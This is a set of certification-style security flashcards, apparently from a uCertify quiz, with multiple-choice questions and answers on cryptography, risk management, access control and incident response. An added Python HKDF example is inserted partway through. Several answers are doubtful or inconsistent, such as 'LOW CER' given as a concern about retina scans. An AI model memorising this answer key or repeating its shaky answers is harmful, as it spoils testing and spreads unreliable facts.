Which of the following is a certificate backed by a stricter identity validation process than the CA's default? (CRYPTOGRAPHY) Extended Validation Email Domain validation Machine Authentication

Extended Validation

YOUR COMPANY HAS RECEIVED AN EMAIL WITH A VIRUS ATTACHED. LATER, YOU REALIZED THAT NO ALARM WAS RAISED, AS THE EMAIL SECURITY SOLUTION YOUR COMPANY USES DIDN'T DETECT THE THREAT. WHAT OCCURRED? (SECURITY FUNDAMENTALS) True negative True positive False negative False positive

FALSE NEGATIVE

THE US GOVT AGENCY PLANS TO MIGRATE SOME OF ITS INTERNALLY HOSTED DATA TO A CLOUD-BASED SERVICE. YOU NEED TO MAKE SURE THE PROPOSED VENDOR CAN MEET THE SAME SEC REQS AS THE CURRENT SOLUTION. WHAT ARE YOU CURRENTLY PRACTICING? (SECURITY FUNDAMENTALS) FISMA COMPLIANCE DUE DILIGENCE DUE CARE GLBA COMPLIANCE GDPR COMPLIANCE

FISMA COMPLIANCE & DUE DILIGENCE

WHICH OF THE FOLLOWING IS AN INTEGRATED CIRCUIT WITH A LOGICAL STRUCTURE THAT CAN BE REPROGRAMMED AFTER MANUFACTURE, IN CONTRAST TO THE PRE-PRINTED LOGIC FUNCTION FOUND IN A MICROPROCESSOR OR ASIC? SoC FPGA RTOS IoT

FPGA (FIELD-PROGRAMMABLE GATE ARRAY)

WHICH OF THE FOLLOWING SECURE PROTOCOLS ADD SSL/TLS SECURITY TO PROTOCOLS THAT WERE INSECURE ON THEIR OWN? FTPS HTTPS SFTP SNMPV3 SSH

FTPS, HTTPS (SFTP IS A SUBSYSTEM OF SSH, NOT FTP OVER TLS; SNMPV3 SECURES ITSELF WITH ITS OWN USER-BASED SECURITY MODEL, HMAC AUTHENTICATION PLUS AES/DES PRIVACY, RATHER THAN WITH SSL/TLS)

YOUR FRIEND IS A GOVT CONTRACTOR WHO DISCLOSED SENSITIVE GOVT INFO TO YOU TO UNCOVER WHAT HE BELIEVED WERE UNETHICAL ACTIVITIES. WHICH OF THE FOLLOWING TERMS BEST DESCRIBES HIS ACTIVITIES? CHOOSE 2 (RISK MGMT) HACKTIVIST INSIDER ORG CRIME APT STATE ACTOR

HACKTIVIST & INSIDER

WHICH CATEGORY OF ATTACKERS MIGHT ALSO BE CALLED CYBERTERRORISTS? (RISK MGMT) HACKTIVISTS INSIDERS SCRIPT KIDDIES COMPETITORS

HACKTIVISTS

WHICH OF THE FOLLOWING IS LEAST VOLATILE ACCORDING TO THE FORENSIC ORDER OF VOLATILITY? HARD DRIVES ROUTING TABLES CACHE MEMORY CPU REGISTERS

HARD DRIVES ORDER OF VOLATILITY: - CPU REGISTERS & CACHE MEMORY - ROUTING TABLES, ARP CACHE, PROCESS TABLES, AND KERNEL STATS - OTHER RAM CONTEXTS - SWAP FILES OR OTHER TEMP FILE SYSTEMS - OTHER DATA ON HARD DRIVES OR FLASH MEDIA - NETWORK LOGGING DATA - FIRMWARE OR PHYSICAL CONFIGURATION - ARCHIVAL MEDIA SUCH AS OPTICAL DISCS OR PRINT-OUTS

YOUR COMPANY IS DEVELOPING AN APPLICATION IN WHICH A PRIVATE US-BASED HOSPITAL WILL ALLOW PATIENTS TO ACCESS THEIR MEDICAL RECORDS ONLINE. REGARDLESS OF WHAT OTHER DATA THE APPLICATION HANDLES, WHAT KIND OF COMPLIANCE DO YOU ALREADY KNOW YOU NEED TO RESEARCH? (SECURITY FUNDAMENTALS) FERPA FISMA HIPAA PCI DSS

HIPAA

WHICH OF THE FOLLOWING ARE USED IN DATA CENTERS AS PART OF AIRFLOW AND THERMAL REGULATION? AIR GAPS BOLLARDS HOT AND COLD AISLES VISITOR LOGS

HOT AND COLD AISLES

What type of cryptography is best suited for key generation? (CRYPTOGRAPHY) Symmetric encryption One-Time Pad Hashing Asymmetric encryption

Hashing (key derivation functions such as HKDF and PBKDF2 are built from hash functions and HMAC)
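The hash-based key derivation behind that answer, as an added example that is not part of the uCertify quiz: HKDF (RFC 5869) built from HMAC-SHA256 using only the Python standard library. It turns one shared secret into several independent keys and checks itself against RFC 5869 test case 1; the session-key names, the shared secret and the transcript value are assumptions for illustration.

```python
"""Key derivation with a hash: HKDF (RFC 5869) built from HMAC-SHA256.

Added example, not part of the uCertify quiz. A hash-based extract-then-expand
step turns raw secret material (a Diffie-Hellman output, a master secret) into
as many independent fixed-length keys as a protocol needs; `password_key`
shows the slow, salted variant (PBKDF2) used when the input is a human
password. `rfc5869_self_test` checks the code against RFC 5869 test case 1.
"""
import hashlib
import hmac

HASH = hashlib.sha256
HASH_LEN = HASH().digest_size


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """Concentrate possibly uneven input keying material into a fixed PRK."""
    if not salt:                       # RFC 5869: absent salt = HashLen zero bytes
        salt = b"\x00" * HASH_LEN
    return hmac.new(salt, ikm, HASH).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """Stretch the PRK into `length` bytes bound to the context string `info`."""
    if length > 255 * HASH_LEN:
        raise ValueError("HKDF can expand to at most 255 * HashLen bytes")
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def hkdf(ikm: bytes, salt: bytes, info: bytes, length: int) -> bytes:
    return hkdf_expand(hkdf_extract(salt, ikm), info, length)


def derive_session_keys(shared_secret: bytes, transcript_hash: bytes) -> dict:
    """One secret, several unrelated keys (names are illustrative assumptions).
    Only `info` differs per key, so compromise of one key reveals nothing
    about the others."""
    return {
        "client_write_key": hkdf(shared_secret, transcript_hash, b"client write", 32),
        "server_write_key": hkdf(shared_secret, transcript_hash, b"server write", 32),
        "client_write_iv": hkdf(shared_secret, transcript_hash, b"client iv", 12),
        "server_write_iv": hkdf(shared_secret, transcript_hash, b"server iv", 12),
    }


def password_key(password: str, salt: bytes, iterations: int = 600_000) -> bytes:
    """Passwords are low-entropy, so the hash is iterated to slow down guessing;
    plain HKDF is not suitable for them."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, 32)


def rfc5869_self_test() -> bool:
    """RFC 5869, Appendix A, test case 1 (SHA-256)."""
    ikm = bytes.fromhex("0b" * 22)
    salt = bytes.fromhex("000102030405060708090a0b0c")
    info = bytes.fromhex("f0f1f2f3f4f5f6f7f8f9")
    expected = ("3cb25f25faacd57a90434f64d0362f2a2d2d0a90cf1a5a4c"
                "5db02d56ecc4c5bf34007208d5b887185865")
    return hkdf(ikm, salt, info, 42).hex() == expected


if __name__ == "__main__":
    print("RFC 5869 vector:", "ok" if rfc5869_self_test() else "FAIL")
    # Constructed inputs: in a real protocol these come from the key exchange.
    keys = derive_session_keys(b"constructed shared secret", HASH(b"transcript").digest())
    for name, key in keys.items():
        print(f"{name:17} {key.hex()}")
```

Binding the transcript hash in as the salt and a distinct label in `info` is what ties each derived key to one run of one protocol role; reusing the same `info` for two purposes would hand both purposes the same key.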

YOUR DEPARTMENT HAS IMPLEMENTED A DECOY HAVING NO USEFUL RESOURCES AND ISOLATED IT FROM THE REST OF THE NETWORK SO THAT COMPROMISING IT WON'T EVEN BE USEFUL FOR MOUNTING AN INSIDE ATTACK. WHAT TECHNIQUE IS BEING USED? IPS HONEYPOT ANOMALY ANALYSIS NGFW

Honeypot

WHICH OF THE FOLLOWING REPS THE CORRECT ORDER OF STEPS INVOLVED IN A COMPLETE RISK ASSESSMENT? (RISK MGMT) - ID ASSETS AT RISK - EVAL THREAT PROBABILITY - CONDUCT THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - PRIORITIZE RISKS - CREATE MITIGATION STRATEGY - ID ASSETS AT RISK - CREATE A MITIGATION STRATEGY - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS -ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - CREATE A MITIGATION STRATEGY - ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - ANALYZE BUSINESS IMPACT - CREATE A MITIGATION STRATEGY

ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - CREATE A MITIGATION STRATEGY

YOU HAVE IMPLEMENTED A PASSIVE MONITORING SYSTEM THAT IS DESIGNED TO KEEP ADMINISTRATORS AWARE OF MALICIOUS ACTIVITY AND CAN RECORD DETECTED INTRUSIONS IN A DATABASE AND SEND ALERT NOTIFICATIONS SO THAT THE ADMINISTRATORS CAN TAKE ACTION. WHICH OF THE FOLLOWING HAVE YOU IMPLEMENTED? APPLICATION LAYER FIREWALL IDS IPS STATEFUL FIREWALL

IDS

WHICH OF THE FOLLOWING STATEMENTS IS TRUE REGARDING RAID? - ALWAYS USE RAID AS A SUBSTITUTE FOR MAKING REGULAR DATA BACKUPS - IF THE RAID CONTROLLER FAILS, OR IF MALWARE OR OTHER SOFTWARE WRITES CORRUPTED DATA TO THE DISK, IT MATTERS HOW MANY MIRRORED OR PARITY DISKS YOU HAVE - MOST USE HOT-SWAPPABLE DRIVES SO THAT YOU CAN REPLACE A FAILED DRIVE AND REBUILD THE ARRAY - IF ONE OF THE DRIVES IN THE ARRAY FAILS, THE DATA STORED ON THE FAILED DRIVE CAN BE RECREATED FROM THE PARITY DATA ON THE REMAINING DRIVES

IF ONE OF THE DRIVES IN THE ARRAY FAILS, THE DATA STORED ON THE FAILED DRIVE CAN BE RECREATED FROM THE PARITY DATA ON THE REMAINING DRIVES (RAID PROTECTS AGAINST DRIVE FAILURE ONLY; A FAILED CONTROLLER OR CORRUPT WRITES HIT EVERY COPY, SO RAID IS NOT A BACKUP)

WHICH OF THE FOLLOWING IS A SPECIFIC IMPLEMENTATION OF THE ISAKMP FRAMEWORK THAT AUTHENTICATES SAS BETWEEN 2 HOSTS AND EXCHANGES ENCRYPTION KEYS TO SET UP A SECURE CHANNEL? AH ESP IKE L2TP

IKE (INTERNET KEY EXCHANGE)

WHICH OF THE FOLLOWING IS A MODEL FOR ACCESS SECURITY THAT DENIES THE ACCESS UNLESS A RULE EXPLICITLY ALLOWS IT? EXPLICIT ALLOW EXPLICIT DENY IMPLICIT ALLOW IMPLICIT DENY

IMPLICIT DENY

WHICH ELEMENT OF YOUR RISK MITIGATION STRATEGY PROVIDES THE BEST HELP WHEN SOMETHING DOES GO WRONG WITH SECURITY, YOU NEED TO DETERMINE WHAT HARM WAS DONE, AND RESTORE THE SYSTEM TO A SECURE STATE? (RISK MGMT) SECURITY AUDITS TECHNICAL CONTROLS CHANGE MGMT INCIDENT MGMT

INCIDENT MGMT

WHICH DOCUMENT SPECIFICALLY COVERS PROCEDURES FOR RESTORING INDIVIDUAL INFORMATION SYSTEMS AFTER A DISASTER OR FOR MAINTAINING PARTIAL FUNCTION DURING THE RECOVERY PROCESS? BCP BIA ISCP COOP

ISCP (INFORMATION SYSTEM CONTINGENCY PLAN)

YOU'RE DISCUSSING WPA AUTHENTICATION WITH YOUR COLLEAGUES AND ONE OF THEM HAS ASKED ABOUT THE CAPTIVE PORTAL. WHICH OF THE FOLLOWING WILL YOU ANSWER? IT RELIES ON WIRELESS-SPECIFIC TECH USERS CAN FREELY ACCESS THE NETWORK UNTIL THEY SATISFY THE CONDITIONS OF THE PORTAL IT CAN BE BYPASSED AND ONLY PROVIDES ENCRYPTION WHEN USED WITH THE ENHANCED OPEN FEATURE OF WPA3 IT IS PART OF THE WI-FI SPECIFICATION

IT CAN BE BYPASSED AND ONLY PROVIDES ENCRYPTION WHEN USED WITH THE ENHANCED OPEN (OWE) FEATURE OF WPA3

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING BITLOCKER? EACH USER ACCOUNT HAS A SEPARATE BITLOCKER KEY STORED IN ITS SETTINGS IT PROTECTS ENTIRE DRIVES W/PERSONAL AND SYSTEM FILES ANY USER CAN INDEPENDENTLY ENCRYPT FILES USING BITLOCKER BITLOCKER ENCRYPTED FILES ARE UNREADABLE TO OTHER USERS ON THE SAME COMPUTER

IT PROTECTS ENTIRE DRIVES WITH PERSONAL AND SYSTEM FILES. ONCE THE VOLUME IS UNLOCKED AT STARTUP, ALL USERS ON A BITLOCKER-ENCRYPTED SYSTEM CAN ACCESS THE FULL SYSTEM (PER-USER SEPARATION IS LEFT TO NTFS PERMISSIONS OR EFS). BITLOCKER MUST BE ENABLED FOR THE ENTIRE COMPUTER BY AN ADMINISTRATOR. BITLOCKER USES ONE KEY FOR THE ENTIRE VOLUME, WHICH MUST BE SUPPLIED ON SYSTEM STARTUP (BY THE TPM, A PIN, OR A USB KEY)

WHICH OF THE FOLLOWING USES MACHINE-READABLE DEFINITION FILES TO GENERATE AND DEPLOY SERVICE COMPONENTS IN AN AUTOMATED PROCESS? VPC EBS IoT IaC

IaC

WHICH OF THE FOLLOWING IS A ROLE IN A SAML SYSTEM THAT HOLDS A DIRECTORY OF USERS AND THEIR PERMISSION? OWNER SP PRINCIPAL IDP

IdP. SAML (SECURITY ASSERTION MARKUP LANGUAGE) = OPEN XML-BASED STD USED TO EXCHANGE AUTHENTICATION & AUTHORIZATION INFO. WORKS BY SENDING XML-BASED MSGS BETWEEN SYSTEMS & IS TRANSPARENT TO THE END-USER. ROLES: Principal: client seeking to be authenticated, typically an end-user. IdP: an Identity Provider is an authentication server that holds a directory of users & their permissions. SP: a Service Provider is a server containing resources.

WHICH OF THE FOLLOWING LANGUAGES DOES XSS TARGET? HTML PYTHON PHP JAVASCRIPT

JAVASCRIPT

YOUR ORG HAS ITS EMPLOYEES SWITCH DUTY RESPONSIBILITIES EVERY 3 MONTHS. WHAT SECURITY PRINCIPLE ARE THEY EMPLOYING? MANDATORY VACATIONS JOB ROTATION SEPARATION OF DUTIES LEAST PRIVILEGE

JOB ROTATION

Your employer demands a copy of all private keys used on devices you use for work, since regulatory requirements require them to be able to decrypt any official communications when legally requested. What is this an example of? (CRYPTOGRAPHY) KEY ESCROW KEY RECOVERY PKI HIERARCHY REVOCATION

KEY ESCROW

WHAT INJECTION ATTACK IS FREQUENTLY USED FOR NETWORK DIRECTORY SERVICES, SUCH AS ACCESSING USER NAMES AND PASSWORDS, CORPORATE EMAIL DIRECTORIES, SYSTEM OR NETWORK INFORMATION? COMMAND INJECTION NoSQL INJECTION LDAP INJECTION DLL INJECTION

LDAP INJECTION (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL)

WHAT ORDER DOES WINDOWS PROCESS GPOS IN? LOCAL - CHILD OU - SITE - DOMAIN - ORG UNIT SITE - DOMAIN - LOCAL - ORG UNIT - CHILD LOCAL - SITE - DOMAIN - ORG UNIT - CHILD OU DOMAIN - CHILD - LOCAL - ORG UNIT - SITE

LOCAL - SITE - DOMAIN - ORG UNIT - CHILD OU

Jacob is planning his organization's biometric authentication system and is considering retina scans. What concern may be raised about retina scans by others in his organization? HIGH FAR & LOW FRR HIGH FRR & LOW FAR LOW CER HIGH CER

LOW CER. THE CROSSOVER ERROR RATE IS THE POINT WHERE FAR = FRR, SO A LOW CER MEANS BOTH A LOW FALSE REJECTION RATE AND A LOW FALSE ACCEPTANCE RATE

WHICH OF THE FOLLOWING AREAS OF EXPERTISE MIGHT A FULL INCIDENT RESPONSE TEAM INCLUDE? ASSOCIATE LEADERSHIP CULTURAL KNOWLEDGE COMMUNICATIONS

Leadership & Communications

IN WHICH ACCESS CONTROL MODEL, CAN THE ADMINISTRATORS ASSIGN SECURITY CLASSIFICATIONS, OR LABELS, TO EACH USER AND EACH RESOURCE, AND A USER CAN ONLY ACCESS A GIVEN RESOURCE IF THEIR LABELS ARE COMPATIBLE? RBAC DAC MAC TEMPORARY

MAC (MANDATORY ACCESS CONTROL) - DEV FOR MILITARY USE - COMMON IN HIGH-SECURITY ENVIRONMENTS

YOU WANT TO USE A SEC STD THAT ADDS AUTHENTICATION AND ENCRYPTION TO LAYER 2 PROTOCOLS OVER ETHERNET, SUCH AS ARP OR DHCP. WHICH OF THE FOLLOWING WILL YOU USE? MACSEC PORT SECURITY DHCP SNOOPING MAC FILTERING

MACSEC

Which of the following statements is correct regarding threat vector? (SECURITY FUNDAMENTALS) A THREAT VECTOR IS AN UNINTENTIONAL THREAT THE MECHANISM OF MINIMIZING VULNERABILITIES IS CALLED A THREAT VECTOR MALWARE IS A COMMON EXAMPLE OF A THREAT VECTOR A THREAT VECTOR REFERS TO THE PATHWAY THAT ORG TAKES TO FIND THE ATTACKERS

MALWARE IS A COMMON EXAMPLE OF A THREAT VECTOR

WHICH OF THE FOLLOWING IS A SPECIFIC PIECE OF CODE THAT ONLY RUNS WHEN TRIGGERED BY AN OUTSIDE EVENT RECEIVED FROM THE CSP PLATFORM? SOA-BASED WEB APPLICATION MICRO SERVICE CRM APPLICATION BLOB STORAGE SERVICE

MICRO SERVICE

WHAT POLICY DOCUMENT IS SOMETIMES SYNONYMOUS WITH A LETTER OF INTENT? BPA ISA MOU SLA

MOU

WHO AMONG THE FOLLOWING ARE THE INTELLIGENCE AGENCIES & DEDICATED CYBER WARFARE ORGS EMPLOYED TO ATTACK RIVAL GOVTS, BUSINESSES, AND POLITICAL ORGS THAT THEY PERCEIVE TO BE A THREAT TO THE COUNTRY'S NATIONAL INTERESTS? (RISK MGMT) NATION-STATE ACTORS ORGANIZED CRIME HACKTIVISTS INSIDER THREATS

NATION-STATE ACTORS

A CRITICAL NETWORK SERVICE IS HOSTED ON A LEGACY SERVER RUNNING AN OBSOLETE OS, AND YOU CAN'T REPLACE IT UNTIL THE NEXT FISCAL YEAR. YOU JUST LEARNED IT IS INCREDIBLY VULNERABLE TO A NEW WORM THAT'S APPEARED ON OTHER COMPUTERS ON YOUR NETWORK, BUT YOU CAN'T UPDATE THE SERVER OR INSTALL SOFTWARE THAT WILL PROTECT IT. WHAT CAN YOU PLACE BETWEEN THE SERVER AND THE REST OF THE NETWORK TO PROTECT IT? HIDS NIPS AIRGAP FIREWALL

NIPS (NETWORK IPS)

WHICH OF THE FOLLOWING IS A US GOVT AGENCY CHARGED WITH DEVELOPING AND SUPPORTING STDS USED BY OTHER GOVT ORGS? (SECURITY FUNDAMENTALS) ISOC OWASP W3C NIST

NIST

WHICH OF THE FOLLOWING NETWORK SERVICES SYNCHRONIZES CLOCKS BETWEEN NETWORKED COMPUTERS AND DEVICES, RATHER THAN TRANSFERRING USER DATA? DNS DHCP LDAP NTP

NTP

YOUR COMPANY HAS DEVELOPED AN ONLINE GAME AND IT ASKS TO ACCESS YOUR ACCT TO POST YOUR IN-GAME ACHIEVEMENTS AS STATUS UPDATES. YOU ARE WORRIED THAT YOUR COMPANY MAY ACCESS YOUR PRIVATE MESSAGES AND PHOTOS OR CHANGE YOUR ACCT SETTINGS. WHICH OF THE FOLLOWING WILL YOU USE TO SOLVE THIS PROBLEM? ACTIVE DIRECTORY OAUTH TACACS+ SAML

OAUTH (OPEN AUTHORIZATION) STD

What is seen as the most modern & flexible way to find out if a certificate has been revoked? (CRYPTOGRAPHY) CRL CSR OCSP ASN1

OCSP - request/response protocol used over HTTP

WHAT SNMP COMPONENT IS A UNIQUE NUMBER CORRESPONDING TO AN OBJECT PROPERTY THAT CAN BE MONITORED ON A MANAGED DEVICE? OID MIB MANAGER AGENT

OID (Object Identifier)

WHAT KIND OF POLICY GOVERNS A SET OF PROCESSES FOR HOW AN EMPLOYEE NEEDS TO PREPARE A DEVICE TO JOIN THE PROGRAM? ONBOARDING OFF-BOARDING STORAGE SEGMENTATION ASSET TRACKING

ONBOARDING

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING PASSWORD POLICIES? - ONE WAY TO CREATE A VERY LONG PASSWORD IS BY USING A PASSPHRASE, WHICH ONLY HAS MEANING TO THE USER - PASSWORDS SHOULD BE HARD FOR THE USER TO REMEMBER, BUT EASY FOR ANYONE ELSE TO GUESS, EVEN IF THEY KNOW THE USER VERY WELL - PASSWORDS THAT HAVE BEEN CHANGED SHOULD BE REUSED - SHORTER PASSWORDS ARE STRONGER

ONE WAY TO CREATE A VERY LONG PASSWORD IS BY USING A PASSPHRASE, WHICH ONLY HAS MEANING TO THE USER - longer passwords are stronger: user-chosen passwords should be at least 8 characters, and the maximum length should be very permissive, at least 64 characters - even if complexity isn't required, allowing users to use more character types enhances security - passwords should be compared to a list of known simple/easily compromised passwords before they're approved - passwords should always be changed when there's reason to believe they've been compromised - passwords that have been changed should not be reused

WHICH OF THE FOLLOWING IS THE BEST CERTIFICATE FORMAT THAT COMMONLY USES THE WEB OF TRUST MODEL? (CRYPTOGRAPHY) OPENPGP X.509 ASN.1 BRIDGE

OPENPGP

WHICH OF THE FOLLOWING CONTROLS PRIMARILY PROTECT DATA AVAILABILITY? (SEC FUNDAMENTALS) VERSION CONTROL HASHING PATCH MGMT DIGITAL SIGNATURES

PATCH MGMT

WHICH STD DO YOU NEED TO USE WHEN HANDLING CREDIT CARD DATA? PCI DSS NIST HIPAA PKI

PCI DSS

WHICH OF THE FOLLOWING ISN'T AN EAP AUTHENTICATION METHOD, BUT RATHER A PROTOCOL THAT SECURES EAP AUTHENTICATION IN A TLS TUNNEL? EAP-SIM EAP-TLS PEAP EAP-TTLS

PEAP (PROTECTED EAP)

WHICH OF THE FOLLOWING IS THE CORRECT ORDER OF THE DEMING CYCLE? (SECURITY FUNDAMENTALS) ACT - CHECK - PLAN - DO CHECK - ACT - DO - PLAN ACT - CHECK - DO - PLAN PLAN - DO - CHECK - ACT

PLAN - DO - CHECK -ACT

YOU'VE FOUND A COMPUTER INFECTED BY MALWARE THAT CHANGES ITS CODE WHENEVER IT SPREADS IN ORDER TO EVADE DETECTION. WHAT KIND OF MALWARE IS IT? FILELESS MALWARE ARMORED VIRUS POLYMORPHIC MALWARE ROOTKIT

POLYMORPHIC MALWARE

WHAT SEC FEATURE IS ESPECIALLY IMPORTANT FOR PREVENTING ROGUE DEVICES ON THE NETWORK? LOOP PROTECTION DMZ VPN PORT SECURITY

PORT SECURITY

WHICH VPN PROTOCOL WAS INITIALLY DEVELOPED BY A VENDOR CONSORTIUM AND ENCAPSULATES PPP PACKETS OVER GRE TO PROVIDE VPN TUNNELING FEATURES? SSL/TLS L2TP/IPSEC PPTP SSH

PPTP (POINT-TO-POINT TUNNELING PROTOCOL)

WHICH OF THE FOLLOWING IS THE CORRECT ORDER OF THE INCIDENT RESPONSE PROCESS? — ERADICATION - IDENTIFICATION - CONTAINMENT - PREPARATION - INVESTIGATION - RECOVERY - FOLLOW UP — IDENTIFICATION - CONTAINMENT - PREPARATION - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP — IDENTIFICATION - PREPARATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP — PREPARATION - IDENTIFICATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP

PREPARATION - IDENTIFICATION - CONTAINMENT - INVESTIGATION - ERADICATION - RECOVERY - FOLLOW UP

WHAT KIND OF TOOL IS OFTEN USED TO CAPTURE AND ANALYZE NETWORK TRAFFIC? NETWORK MAPPER DATABASE VULNERABILITY TESTER WIRELESS ANALYZER PROTOCOL ANALYZER

PROTOCOL ANALYZER

WHICH OF THE FOLLOWING TECHNIQUES SENDS FORGED, REPLAYED, OR OTHERWISE NON-STD PACKETS TO A NETWORK APP? APPLICATION FUZZING VALIDATION FILE FORMAT FUZZING PROTOCOL FUZZING

PROTOCOL FUZZING

JOE WANTS TO ALLOW GUESTS TO USE HIS ORG'S WIRELESS NETWORK BY PROVIDING A PRESHARED KEY. WHAT SOLUTION CAN HE DEPLOY TO ALLOW USERS TO ACCESS HIS OPEN NETWORK? WI-FI EASY CONNECT PSK CAPTIVE PORTAL 802.1X

PSK (Pre-shared key)

YOU'VE TRACED SOME ANOMALOUS NETWORK ACTIVITY INFECTING THE WHOLE DEPARTMENT's COMPUTERS BY STEALING INFORMATION. THEY'RE INSTALLED AS ADD-ONS WITH LEGITIMATE FREE SOFTWARE APPS BY POPULAR DOWNLOAD SITES. WHAT KIND OF MALWARE IS IT? SPYWARE PUP BOTNET TROJAN

PUP (POTENTIALLY UNWANTED PROGRAM)

WHICH OF THE FOLLOWING TECHNIQUES IS ALSO DEFINED AS TAILGATING? PHISHING PIGGYBACKING BAITING PRETEXTING

Piggybacking

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING QUALITATIVE RISK ASSESSMENT? (RISK MGMT) - QUALITATIVE RISK ASSESSMENT RELIES ON HAVING CONCRETE FINANCIAL VALUE FOR THE IMPACT OF LOSSES, OR STRICT PERCENTAGE FOR LIKELIHOOD - QUALITATIVE RISK ASSESSMENT CAN GIVE A CLEAR COST-BENEFIT ANALYSIS FOR A GIVEN SEC CONTROL - QUALITATIVE RISK ASSESSMENT IS GENERALLY BEST SUITED FOR INTANGIBLE ASSETS - QUALITATIVE RISK ASSESSMENT ASSIGNS AN OBJECTIVE VALUE, TYPICALLY A MONETARY FIGURE TO EACH RISK

QUALITATIVE RISK ASSESSMENT IS GENERALLY BEST SUITED FOR INTANGIBLE ASSETS

YOU HAVE OBSERVED AN UNEXPECTED RESULT WHEN 2 OPS ARE ATTEMPTED AT THE SAME TIME AND THE ACTIONS DO NOT OCCUR IN THE EXPECTED ORDER. WHAT TYPE OF FLAW DOES THE APPLICATION HAVE? BUFFER OVERFLOW REQUEST FORGERY RACE CONDITION INJECTION

RACE CONDITION

JOE WANTS TO IMPLEMENT AN AAA SYSTEM FOR DIAL-IN USERS TO NETWORKS. WHICH OF THE FOLLOWING IS AN AAA SYSTEM HE COULD IMPLEMENT? SAML RADIUS LDAP OAUTH

RADIUS

WHICH OF THE FOLLOWING ALLOWS REDUNDANCY BY SAVING DATA TO MULTIPLE HARD DRIVES AT ONCE? - REDUNDANT POWER SUPPLY - BACK POWER SOURCE - NIC TEAMING - RAID

RAID (REDUNDANT ARRAY OF INDEPENDENT/INEXPENSIVE DISKS)

YOU WANT TO IMPLEMENT A MIRRORED DRIVE SOLUTION. WHAT RAID LEVEL DOES THIS DESCRIBE? RAID 0 RAID 1 RAID 5 RAID 6

RAID 1

CRYPTO-MALWARE IS A TYPE OF WHAT SORT OF MALWARE? TROJAN ROOTKIT RANSOMWARE KEYLOGGER

RANSOMWARE

WHICH OF THE FOLLOWING CONTAINS A 64-BIT ARM CPU AND SUPPORTS LINUX NATIVELY AND HAS THE RESOURCES AND HARDWARE TO RUN THE OS AND SERVICES? RTOS SYSTEM ON A CHIP FPGA RASPBERRY PI

RASPBERRY PI

Which of the following was initially designed as a stream cipher? (CRYPTOGRAPHY) BLOWFISH AES TWOFISH RC4

RC4

WHAT USER PERMISSIONS WOULD A LINUX FILE HAVE IF ITS PERMISSIONS ARE DISPLAYED AS '-rwxrw-r--'? READ, WRITE, AND EXECUTE READ ONLY READ AND WRITE WRITE ONLY

READ, WRITE, AND EXECUTE (rwx) | rwx = User | rw- = Group | r-- = Others

WHICH OF THE FOLLOWING RELIES ON IP SPOOFING TO GENERATE OVERWHELMING TRAFFIC FROM UNRELATED HOSTS, OFTEN ONES THE TARGET WOULDN'T WANT TO BLOCK? VLAN HOPPING BLUESNARFING MALFORMED PACKETS REFLECTED ATTACK

REFLECTED ATTACK

YOU HAVE DETECTED A POTENTIAL SOCIAL ENGINEERING ATTACK BECAUSE THE RETURN EMAIL ADDRESS IS A DOMAIN ASSOCIATED WITH SCAMMERS. WHICH OF THE FOLLOWING IS THE THREAT INDICATOR THAT BEST REPRESENTS THE SCENARIO? (RISK MGMT) BEHAVIORAL RISK REGISTER REPUTATIONAL VULNERABILITY

REPUTATIONAL INDICATOR

IN WHICH OF THE FOLLOWING RISK MGMT STRATEGIES WOULD CYBERSECURITY BE USED? (RISK MGMT) RISK ACCEPTANCE RISK TRANSFERENCE RISK DETERRENCE RISK AVOIDANCE

RISK TRANSFERENCE

YOUR ORG WANTS TO IMPLEMENT AN ACCESS CONTROL SCHEME THAT SETS PERMISSIONS BASED ON WHAT THE INDIVIDUAL'S JOB REQUIRES. WHICH OF THE FOLLOWING SCHEME IS MOST SUITED TO THIS TYPE OF IMPLEMENTATION? ATTRIBUTE-BASED ACCESS CONTROL ROLE-BASED ACCESS CONTROL MANDATORY ACCESS CONTROL DISCRETIONARY ACCESS CONTROL

ROLE-BASED ACCESS CONTROL

WHAT IS THE MOST ESSENTIAL TOOL FOR SEGMENTING BROADCAST DOMAINS? VLANS SWITCHES ROUTERS BRIDGES

ROUTERS

WHICH OF THE FOLLOWING IS THE MAXIMUM EXPECTED AMOUNT OF DOWNTIME BETWEEN WHEN A SERVICE IS TAKEN OFFLINE BY A DISASTER AND WHEN ITS FUNCTIONS WILL BE FULLY RESTORED? RTO RPO MTBF MTTR

RTO (RECOVERY TIME OBJECTIVE)

WHICH ACCESS CONTROL MODEL IS USED BY NETWORK HARDWARE SUCH AS ROUTERS? MANDATORY ROLE-BASED RULE-BASED DISCRETIONARY

RULE-BASED - STATIC| DYNAMIC| TRIGGERED BY EVENTS

WHICH OF THE FOLLOWING IS USED TO MONITOR STATE CHANGES IN LARGE SCALE DISTRIBUTION SYSTEMS SUCH AS ELECTRICAL GRIDS, WASTE CONTROL SYSTEMS, AND TRANSPORTATION? DCS IOT SCADA VOIP

SCADA (SUPERVISORY CONTROL AND DATA ACQUISITION)

